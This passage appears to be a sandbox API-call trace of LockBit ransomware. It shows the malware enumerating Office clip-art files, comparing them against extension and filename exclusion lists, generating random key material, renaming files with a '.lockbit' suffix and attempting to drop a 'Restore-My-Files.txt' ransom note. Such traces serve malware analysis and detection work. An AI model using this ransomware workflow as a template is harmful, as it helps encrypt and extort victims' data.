dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216612.WMF", cAlternateFileName="")) returned 1 [0152.717] lstrcmpiW (lpString1=".", lpString2="J0216612.WMF") returned -1 [0152.717] lstrcmpiW (lpString1="..", lpString2="J0216612.WMF") returned -1 [0152.717] PathFindExtensionW (pszPath="J0216612.WMF") returned=".WMF" [0152.717] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.718] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.719] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.719] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216612.WMF") returned 1 [0152.720] lstrcmpiW (lpString1="ntldr", lpString2="J0216612.WMF") returned 1 [0152.720] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216612.WMF") returned 1 [0152.720] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216612.WMF") returned -1 [0152.720] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216612.WMF") returned -1 [0152.720] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216612.WMF") returned 1 [0152.720] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216612.WMF") returned -1 [0152.720] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.720] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF") returned=".WMF" [0152.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.721] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.721] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.722] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.722] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.722] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.722] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.722] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.722] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF.lockbit") returned 72 [0152.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216612.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.727] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.728] malloc (_Size=0x40068) returned 0x3d70450 [0152.728] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=9442) returned 1 [0152.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.729] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0152.733] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.733] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.733] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.734] free (_Block=0x1fa2ed8) [0152.734] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216612.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.734] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.734] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9b3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216874.WMF", cAlternateFileName="")) returned 1 [0152.734] lstrcmpiW (lpString1=".", lpString2="J0216874.WMF") returned -1 [0152.735] lstrcmpiW (lpString1="..", lpString2="J0216874.WMF") returned -1 [0152.735] PathFindExtensionW (pszPath="J0216874.WMF") returned=".WMF" [0152.735] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.735] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.736] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.736] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216874.WMF") returned 1 [0152.737] lstrcmpiW (lpString1="ntldr", lpString2="J0216874.WMF") returned 1 [0152.737] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216874.WMF") returned 1 [0152.737] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216874.WMF") returned -1 [0152.737] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216874.WMF") returned -1 [0152.737] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216874.WMF") returned 1 [0152.737] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216874.WMF") returned -1 [0152.737] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.737] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF") returned=".WMF" [0152.737] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.737] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.737] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.738] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.739] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF.lockbit") returned 72 [0152.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216874.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0152.743] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.743] malloc (_Size=0x40068) returned 0x3e70008 [0152.744] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=39738) returned 1 [0152.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.745] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.745] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0152.749] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.749] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.750] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.751] free (_Block=0x1fa2ed8) [0152.751] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216874.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.751] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.751] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.751] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6607e0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1484, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0217262.WMF", cAlternateFileName="")) returned 1 [0152.751] lstrcmpiW (lpString1=".", lpString2="J0217262.WMF") returned -1 [0152.751] lstrcmpiW (lpString1="..", lpString2="J0217262.WMF") returned -1 [0152.752] PathFindExtensionW (pszPath="J0217262.WMF") returned=".WMF" [0152.752] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.752] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.753] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.753] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0217262.WMF") returned 1 [0152.753] lstrcmpiW (lpString1="ntldr", lpString2="J0217262.WMF") returned 1 [0152.753] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0217262.WMF") returned 1 [0152.753] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0217262.WMF") returned -1 [0152.754] lstrcmpiW (lpString1="autorun.inf", lpString2="J0217262.WMF") returned -1 [0152.754] lstrcmpiW (lpString1="thumbs.db", lpString2="J0217262.WMF") returned 1 [0152.754] lstrcmpiW (lpString1="iconcache.db", lpString2="J0217262.WMF") returned -1 [0152.754] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.754] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0217262.WMF") returned=".WMF" [0152.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.754] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.754] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.755] lstrcmpiW 